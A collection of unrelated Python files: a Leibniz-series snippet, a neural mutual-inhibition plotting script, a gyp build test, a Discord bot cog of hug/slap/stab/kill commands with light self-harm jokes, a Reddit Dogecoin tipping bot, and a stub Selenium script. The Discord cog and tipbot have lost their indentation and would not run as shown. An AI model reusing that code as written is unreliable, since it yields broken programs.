# pi_list = list()
# pi1 = int(input("Enter the dividend: "))
# pi2 = int(input("Enter the divisor: "))
# for i in range(8):
#     pi3 = (pi1 / pi2)
#     pi_list.append(pi3)
#     pi2 += 2
# pi = float(pi_list[0] - pi_list[1] + pi_list[2] - pi_list[3] + pi_list[4] - pi_list[5] + pi_list[6] - pi_list[7])
# print("Sum of the first 8 terms of the Leibniz series =", pi)
# import math
# n = 20
# x = int(input("Enter the number to look for: "))
# if x == 1:
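# A minimal runnable sketch of the same idea (an assumption about the intent: the
# commented-out loop above accumulates terms of the alternating Leibniz series):
def leibniz_partial_sum(terms=8):
    # 1 - 1/3 + 1/5 - 1/7 + ... for the first `terms` terms
    return sum((-1) ** k / (2 * k + 1) for k in range(terms))

# 4 * leibniz_partial_sum(8) gives a rough approximation of pi (about 3.017)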
|
#! /usr/bin/python3
import sys
import os
sys.path.insert(0, os.path.abspath('../models'))
import numpy as np
import matplotlib.pyplot as plt
from network import MutualInhibit


def f(s):
    return 50 * (1 + np.tanh(s))


#1
def plot_nullclines(ls='-'):
    MutualInhibit(f, np.r_[0, 0]).plot_nullclines(ls=ls)
    plt.legend()


#2
def x_evolution(x0s):
    plot_nullclines('--')
    for x0 in x0s:
        network = MutualInhibit(f, x0)
        network.simulate(100)
        network.plot_x_his()


#3
def vector_field():
    X, Y = np.meshgrid(np.linspace(-50, 150, 15), np.linspace(-50, 150, 15))
    U = -X + f(-0.1*Y + 5)
    V = -Y + f(-0.1*X + 5)
    Q = plt.quiver(X, Y, U, V, units='xy', scale=20, lw=0.8)
    plt.quiverkey(Q, 0.05, 1.05, 200, '200', labelpos='E')
    MutualInhibit(f, np.r_[0, 0]).plot_nullclines(ls='--', lw=0.8)
    lgd = plt.legend(loc=9, bbox_to_anchor=(0.77, 1.12), ncol=2)
    return (lgd,)


x0s = np.array([[-50, -50], [-25, -50], [100, 130], [3, 50], [-40, 150],
                [150, 90], [140, 141], [75, -50]])
cmd_functions = [
    plot_nullclines,
    lambda: x_evolution(x0s),
    vector_field,
]

if __name__ == "__main__":
    n = int(sys.argv[1])
    art = cmd_functions[n - 1]()
    plt.savefig(
        "../../figures/mutual{}".format(n),
        bbox_extra_artists=art, bbox_inches='tight')
    plt.show()
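# A rough sketch (not part of the original script) of the dynamics the vector field above
# implies: each unit decays toward zero and is driven by f of the *other* unit's activity,
# i.e. dx1/dt = -x1 + f(-0.1*x2 + 5) and dx2/dt = -x2 + f(-0.1*x1 + 5). MutualInhibit is
# imported from ../models, so its exact update rule is an assumption here.
def euler_step(x, dt=0.1):
    x1, x2 = x
    dx1 = -x1 + f(-0.1 * x2 + 5)
    dx2 = -x2 + f(-0.1 * x1 + 5)
    return np.array([x1 + dt * dx1, x2 + dt * dx2])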
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies rules related variables are expanded.
"""
import sys
if sys.platform == 'win32':
  print "This test is currently disabled: https://crbug.com/483696."
  sys.exit(0)
import TestGyp
test = TestGyp.TestGyp(formats=['ninja'])
test.relocate('src', 'relocate/src')
test.run_gyp('variables.gyp', chdir='relocate/src')
test.build('variables.gyp', chdir='relocate/src')
test.run_built_executable('all_rule_variables',
                          chdir='relocate/src',
                          stdout="input_root\ninput_dirname\ninput_path\n" +
                                 "input_ext\ninput_name\n")
test.pass_test()
|
import random
import discord
import asyncio
from discord.ext import commands
from DTbot import bot
from linklist import baddoggo_links, bkiss_links, blush_links, cage_links, cry_links, cuddle_links, glomp_links, handholding_links, highfive_links, hug_links, kiss_links, kick_links, lewd_links, lick_links, pat_links, pinch_links, poke_links, punch_links, slap_links, stab_links, tickle_links, whip_links
class Interaction():
"""Commands which interact with others"""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True,
description="Call someone a bad doggo",
brief="Call someone a bad doggo",
aliases=['shame', 'baddog'])
async def baddoggo(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} called themselves a bad doggo. I think they just misspoke. Because if they were a doggo, they'd be a good one. A very good one.".format(ctx.message.author.mention))
else:
possible_responses = baddoggo_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + ", you're being a very bad dog! {} is disappointed in you!".format(ctx.message.author.mention) + "\n\n[Image Link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Bitch slaps someone",
brief="Bitch slaps someone")
async def bitchslap(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to give themselves a mean bitch slap. All they decide to do is rub their cheeks.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got a bitch slap.".format(user.mention) + "\n\n[Image link](https://i.imgur.com/bTGigCv.gif)")
embed.set_image(url="https://i.imgur.com/bTGigCv.gif")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Kiss someone the non-romantic way",
brief="A non-romantic kiss")
async def bkiss(self, ctx, user: discord.Member):
possible_responses = bkiss_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} kissed themselves in a non-romantic way. It's very important to be happy about oneself, though self-love is even better!".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kissed.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Blush\nCan be given a reason",
brief="Blush")
async def blush(self, ctx, *reason: str):
possible_responses = blush_links
chosen = random.choice(possible_responses)
if reason:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} blushed because of ".format(ctx.message.author.mention) + ' '.join(reason) + "! How cute!\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} blushed! How cute!".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Cuddle someone",
brief="Cuddle someone")
async def cuddle(self, ctx, user: discord.Member):
possible_responses = cuddle_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} cuddled themselves! They seem so happy about being here.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got cuddled.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Cage someone",
brief="Cage someone")
async def cage(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Just as {} tried to enter the cage, their friends surprised them with a party. Hooray!".format(ctx.message.author.mention))
else:
possible_responses = cage_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got caged.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Confess your feelings to someone",
brief="Confess your feelings to someone")
async def confess(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} confessed their love for themselves! Aww, what a great example of self-love.".format(user.mention))
message = await self.bot.say(embed=embed)
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + ", you've been confessed to by {}!".format(ctx.message.author.mention) + "\nWill you let the ship set sail or will you sink it before its journey starts? " + u"\u26F5")
message = await self.bot.say(embed=embed)
await self.bot.add_reaction(message, u"\u2764")
await self.bot.add_reaction(message, u"\U0001F494")
await asyncio.sleep(1)
def check(reaction, user):
e = str(reaction.emoji)
return e.startswith((u"\u2764", u"\U0001F494"))
response = await self.bot.wait_for_reaction(message=message, check=check)
if response.user.id == user.id:
if response.reaction.emoji == u"\u2764":
await self.bot.say("**{0.user.display_name}** accepted **{1}'s** feelings! The ship has set sail! Congratulations! :heart: :sailboat:".format(response, ctx.message.author.display_name))
elif response.reaction.emoji == u"\U0001F494":
await self.bot.say("**{0.user.display_name}** rejected **{1}**! Don't worry, I have ice cream buckets for you. :ice_cream: <:kannahug:461996510637326386>".format(response, ctx.message.author.display_name))
else:
return
else:
return
@commands.command(pass_context=True,
description="Cry\nCan be given a reason",
brief="Cry")
async def cry(self, ctx, *reason: str):
possible_responses = cry_links
chosen = random.choice(possible_responses)
if reason:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is crying because of " + ' '.join(reason) + ". Someone, comfort them. <:kannahug:461996510637326386>\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is crying. Someone, comfort them. <:kannahug:461996510637326386>\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Glomp someone",
brief="Glomp someone")
async def glomp(self, ctx, user: discord.Member):
possible_responses = glomp_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} glomped themselves! Someone is very happy to see themselves!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got a glomp from {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Hold someone's hand",
brief="Hold someone's hand",
aliases=['handhold', 'holdhand'])
async def handholding(self, ctx, user: discord.Member):
possible_responses = handholding_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to hold their own hand. Aww. Come here, I'll hold it for you.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is holding {}'s hand! How lewd!".format(user.mention) + "\n\n[Image Link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="High five someone",
brief="High five someone",
aliases=['5'])
async def highfive(self, ctx, user: discord.Member):
possible_responses = highfive_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} gave themselves a high five! You go! Gotta congratulate yourself when others don't.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got a high five from {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Hug someone",
brief="Hug someone")
async def hug(self, ctx, user: discord.Member):
possible_responses = hug_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} hugged themselves! Hooray for self-appreciation!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got hugged.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="What do you think it does",
brief="It's in the name")
async def kill(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to kill themselves. Luckily, they changed their mind and went to get food instead.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got killed.".format(user.mention))
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Kiss someone",
brief="Kiss someone")
async def kiss(self, ctx, user: discord.Member):
possible_responses = kiss_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} gave themselves a kiss! Self-love is very important after all.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kissed.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="KICK THEIR ASS\n\n(This is NOT a moderation command to kick a user from a server.)",
brief="Kick someone")
async def kick(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} aimed to kick themselves. As they noticed, it's quite hard to actually do. So they didn't and went to watch their favorite show.".format(ctx.message.author.mention))
else:
possible_responses = kick_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kicked.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="For something LEWD",
brief="LEWD")
async def lewd(self, ctx, user: discord.Member = None):
possible_responses = lewd_links
chosen = random.choice(possible_responses)
if user:
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Calling yourself out for being lewd, **{}**? How self-aware you are. And yes. Why you gotta be so lewd?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Why you gotta be so lewd, **{}**?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Why you gotta be so lewd?\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Lick someone",
brief="Lick someone")
async def lick(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} licked themselves. Maybe they are secretly a cat and value personal hygiene?".format(ctx.message.author.mention))
else:
possible_responses = lick_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{0} licked {1}.".format(ctx.message.author.mention, user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Notice someone",
brief="Notice someone")
async def notice(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} noticed themselves. Yes, you are here, and yes, it's good you are.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{0} got noticed by {1}.".format(user.mention, ctx.message.author.mention))
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Pat someone",
brief="Pat someone")
async def pat(self, ctx, user: discord.Member):
possible_responses = pat_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} patted themselves. They deserve all the pats!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got a pat.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Pinch someone's cheeks",
brief="Pinch someone's cheeks")
async def pinch(self, ctx, user: discord.Member):
possible_responses = pinch_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} pinched their own cheeks. Maybe they wanted to check if they were dreaming or not?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got their cheeks pinched.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Poke someone",
brief="Poke someone")
async def poke(self, ctx, user: discord.Member):
possible_responses = poke_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} poked themselves. It wasn't hard at all, just a soft boop. And they deserve a boop.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got poked.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Someone gonna get punched",
brief="Punch club")
async def punch(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} wanted to punch themselves. But they only lightly rubbed their belly.".format(ctx.message.author.mention))
else:
possible_responses = punch_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got punched.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Slap 'em hard",
brief="Slap someone")
async def slap(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to slap themselves. 'Twas but a gentle caressing.".format(ctx.message.author.mention))
else:
possible_responses = slap_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got slapped.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Stab someone",
brief="Stab someone")
async def stab(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to stab themselves. Fortunately, their aim was off.".format(ctx.message.author.mention))
else:
possible_responses = stab_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got stabbed by {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Tickle someone",
brief="Tickle someone")
async def tickle(self, ctx, user: discord.Member):
possible_responses = tickle_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tickled themselves. They must be really ticklish if they can do that!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got tickled.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Whip someone (rather kinky)",
brief="Whip someone")
async def whip(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} wants to whip themselves. They must be really kinky.".format(ctx.message.author.mention))
else:
possible_responses = whip_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Bow down, {}.".format(user.mention) + " Time for a whipping!\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
def setup(bot):
bot.add_cog(Interaction(bot))
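# A minimal sketch of how this cog would be loaded from the main bot file (the module
# name "interaction" is an assumption; it should match this file's name without ".py"):
# from DTbot import bot
# bot.load_extension("interaction")   # discord.py then calls setup(bot) above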
|
import time
import datetime
import traceback
from jinja2 import Template
from praw.models import Comment
import bot_logger
import config
import crypto
import lang
import re
import user_function
import utils
import dogetipper
def register_user(rpc, msg):
if not user_function.user_exist(msg.author.name):
address = rpc.getnewaddress("reddit-%s" % msg.author.name)
if address:
msg.reply(
Template(lang.message_register_success + lang.message_footer).render(username=msg.author.name,
address=address))
user_function.add_user(msg.author.name, address)
user_function.add_to_history(msg.author.name, "", "", "", "register")
# create a backup of wallet
rpc.backupwallet(
config.backup_wallet_path + "backup_" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S') + ".dat")
else:
bot_logger.logger.warning('Error during registration!')
else:
bot_logger.logger.info('%s is already registered' % msg.author.name)
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
address = user_function.get_user_address(msg.author.name)
msg.reply(Template(lang.message_already_registered + lang.message_account_details + lang.message_footer).render(
username=msg.author.name,
address=address, balance=str(balance))
)
def balance_user(rpc, msg):
if user_function.user_exist(msg.author.name):
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name) + balance
bot_logger.logger.info('user %s balance = %s' % (msg.author.name, balance))
balance_value_usd = utils.get_coin_value(balance)
pending_value_usd = utils.get_coin_value(pending_balance)
spendable_value_usd = utils.get_coin_value(spendable_balance)
msg.reply(
Template(lang.message_balance + lang.message_footer).render(username=msg.author.name, balance=str(balance),
balance_value_usd=str(balance_value_usd),
pendingbalance=str(pending_balance),
pending_value_usd=str(pending_value_usd),
spendablebalance=str(spendable_balance),
spendable_value_usd=str(spendable_value_usd)))
user_function.add_to_history(msg.author.name, "", "", balance, "balance")
else:
bot_logger.logger.info('user %s not registered ' % msg.author.name)
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def info_user(rpc, msg):
if user_function.user_exist(msg.author.name):
address = user_function.get_user_address(msg.author.name)
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name) + balance
balance_value_usd = utils.get_coin_value(balance)
pending_value_usd = utils.get_coin_value(pending_balance)
spendable_value_usd = utils.get_coin_value(spendable_balance)
msg.reply(Template(lang.message_account_details + lang.message_footer).render(
username=msg.author.name,
balance=str(balance),
balance_value_usd=str(balance_value_usd),
pendingbalance=str(pending_balance),
pending_value_usd=str(pending_value_usd),
spendablebalance=str(spendable_balance),
spendable_value_usd=str(spendable_value_usd),
address=address))
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def help_user(rpc, msg):
if user_function.user_exist(msg.author.name):
address = user_function.get_user_address(msg.author.name)
msg.reply(Template(lang.message_help + lang.message_footer).render(
username=msg.author.name, address=address))
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def withdraw_user(rpc, msg, failover_time):
split_message = msg.body.strip().split()
if user_function.user_exist(msg.author.name):
sender_address = user_function.get_user_address(msg.author.name)
amount = float(split_message[1])
amount = round(amount-0.5)
print(amount)
user_balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
user_spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name)
if utils.check_amount_valid(amount) and split_message[4] != sender_address:
if amount >= float(user_balance) + float(user_spendable_balance):
bot_logger.logger.info('user %s does not have enough to withdraw this amount (%s), balance = %s' % (
msg.author.name, amount, user_balance))
msg.reply(Template(lang.message_balance_low_withdraw).render(
username=msg.author.name, user_balance=str(user_balance), amount=str(amount)) + lang.message_footer)
else:
receiver_address = split_message[4]
if time.time() > int(failover_time.value) + 86400:
send = crypto.send_to(rpc, sender_address, receiver_address, amount)
else:
send = crypto.send_to_failover(rpc, sender_address, receiver_address, amount)
if send:
user_function.add_to_history(msg.author.name, sender_address, receiver_address, amount,
"withdraw")
value_usd = utils.get_coin_value(amount)
msg.reply(Template(lang.message_withdraw + lang.message_footer).render(
username=msg.author.name, receiver_address=receiver_address, amount=str(amount),
value_usd=str(value_usd)))
elif split_message[4] == sender_address:
msg.reply(lang.message_withdraw_to_self + lang.message_footer)
else:
bot_logger.logger.info(lang.message_invalid_amount)
msg.reply(lang.message_invalid_amount + lang.message_footer)
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def tip_user(rpc, reddit, msg, tx_queue, failover_time):
bot_logger.logger.info('A user mention was detected')
bot_logger.logger.debug("failover_time : %s " % (str(failover_time.value)))
split_message = msg.body.lower().strip().split()
tip_index = split_message.index(str('+/u/' + config.bot_name))
if split_message[tip_index] == str('+/u/' + config.bot_name) and split_message[tip_index + 2] == 'doge':
amount = float(split_message[tip_index + 1])
amount = round(amount-0.5)
if utils.check_amount_valid(amount):
parent_comment = msg.parent()
if user_function.user_exist(msg.author.name) and (msg.author.name != parent_comment.author.name):
# check we have enough
user_balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
user_pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
user_spendable_balance = crypto.balance_user(rpc, msg, failover_time)
bot_logger.logger.debug('user_spendable_balance = %s' % user_spendable_balance)
# in failover we need to use only user_balance
if amount >= float(user_spendable_balance):
# not enough for tip
if amount < float(user_pending_balance):
reddit.redditor(msg.author.name).message('pending tip', Template(lang.message_balance_pending_tip).render(username=msg.author.name))
else:
bot_logger.logger.info('user %s does not have enough to tip this amount (%s), balance = %s' % (
msg.author.name, str(amount), str(user_balance)))
reddit.redditor(msg.author.name).message('low balance', Template(lang.message_balance_low_tip).render(username=msg.author.name))
else:
value_usd = utils.get_coin_value(amount)
# check the recipient is registered (has an address) before tipping
if user_function.user_exist(parent_comment.author.name):
txid = crypto.tip_user(rpc, msg.author.name, parent_comment.author.name, amount, tx_queue,
failover_time)
if txid:
user_function.add_to_history(msg.author.name, msg.author.name, parent_comment.author.name,
amount,
"tip send", txid)
user_function.add_to_history(parent_comment.author.name, msg.author.name,
parent_comment.author.name,
amount,
"tip receive", txid)
bot_logger.logger.info(
'%s tip %s to %s' % (msg.author.name, str(amount), parent_comment.author.name))
# if the user included 'verify' in the command (or the tip is at least 1000), reply with a public confirmation
if split_message.count('verify') or int(amount) >= 1000:
msg.reply(Template(lang.message_tip).render(
sender=msg.author.name, receiver=parent_comment.author.name, amount=str(int(amount)),
value_usd=str(value_usd), txid=txid
))
else:
user_function.save_unregistered_tip(msg.author.name, parent_comment.author.name, amount,
msg.fullname)
user_function.add_to_history(msg.author.name, msg.author.name, parent_comment.author.name,
amount,
"tip send", False)
user_function.add_to_history(parent_comment.author.name, msg.author.name,
parent_comment.author.name,
amount,
"tip receive", False)
bot_logger.logger.info('user %s not registered' % parent_comment.author.name)
reddit.redditor(msg.author.name).message('tipped user not registered', Template(lang.message_recipient_register).render(username=parent_comment.author.name))
reddit.redditor(parent_comment.author.name).message(
Template(
lang.message_recipient_need_register_title).render(amount=str(amount)),
Template(
lang.message_recipient_need_register_message).render(
username=parent_comment.author.name, sender=msg.author.name, amount=str(amount),
value_usd=str(value_usd)))
elif user_function.user_exist(msg.author.name) and (msg.author.name == parent_comment.author.name):
reddit.redditor(msg.author.name).message('cannot tip self', Template(lang.message_recipient_self).render(username=msg.author.name))
else:
reddit.redditor(msg.author.name).message('tipped user not registered', Template(lang.message_need_register).render(username=msg.author.name))
else:
bot_logger.logger.info(lang.message_invalid_amount)
reddit.redditor(msg.author.name).message('invalid amount', lang.message_invalid_amount)
def history_user(msg):
if user_function.user_exist(msg.author.name):
data = user_function.get_user_history(msg.author.name)
history_table = "\n\nDate|Sender|Receiver|Amount|Action|Finish|\n"
history_table += "---|---|---|---|:-:|:-:\n"
for tip in data:
str_finish = "Pending"
if tip['finish']:
str_finish = "Successful"
history_table += "%s|%s|%s|%s|%s|%s|\n" % (
datetime.datetime.strptime(tip['time'], '%Y-%m-%dT%H:%M:%S.%f'), tip['sender'], tip['receiver'],
str(tip['amount']), tip['action'], str_finish)
msg.reply(Template(lang.message_history + history_table + lang.message_footer).render(username=msg.author.name))
else:
bot_logger.logger.info('user %s not registered ' % msg.author.name)
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
# Resend tips to previously unregistered users that are now registered
def replay_remove_pending_tip(rpc, reddit, tx_queue, failover_time):
# check if it's not too old & replay tipping
limit_date = datetime.datetime.now() - datetime.timedelta(days=3)
# check if user have pending tips
list_tips = user_function.get_unregistered_tip()
if list_tips:
for tip in list_tips:
bot_logger.logger.info("replay tipping check for %s" % str(tip['id']))
if (datetime.datetime.strptime(tip['time'], '%Y-%m-%dT%H:%M:%S.%f') > limit_date):
if (user_function.user_exist(tip['receiver'])):
bot_logger.logger.info(
"replay tipping %s - %s send %s to %s " % (
str(tip['id']), tip['sender'], tip['amount'], tip['receiver']))
txid = crypto.tip_user(rpc, tip['sender'], tip['receiver'], tip['amount'], tx_queue, failover_time)
user_function.remove_pending_tip(tip['id'])
value_usd = utils.get_coin_value(tip['amount'])
if 'message_fullname' in tip.keys():
msg_id = re.sub(r't\d+_(?P<id>\w+)', r'\g<id>', tip['message_fullname'])
msg = Comment(reddit, msg_id)
msg.reply(Template(lang.message_tip).render(
sender=tip['sender'], receiver=tip['receiver'], amount=str(tip['amount']),
value_usd=str(value_usd), txid=txid))
else:
bot_logger.logger.info(
"replay check for %s - user %s not registered " % (str(tip['id']), tip['receiver']))
else:
bot_logger.logger.info(
"delete old tipping - %s send %s for %s " % (tip['sender'], tip['amount'], tip['receiver']))
user_function.remove_pending_tip(tip['id'])
else:
bot_logger.logger.info("no pending tipping")
|
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.keys import Keys
import time


def admin_Portal():
    driver = webdriver.Chrome(ChromeDriverManager().install())
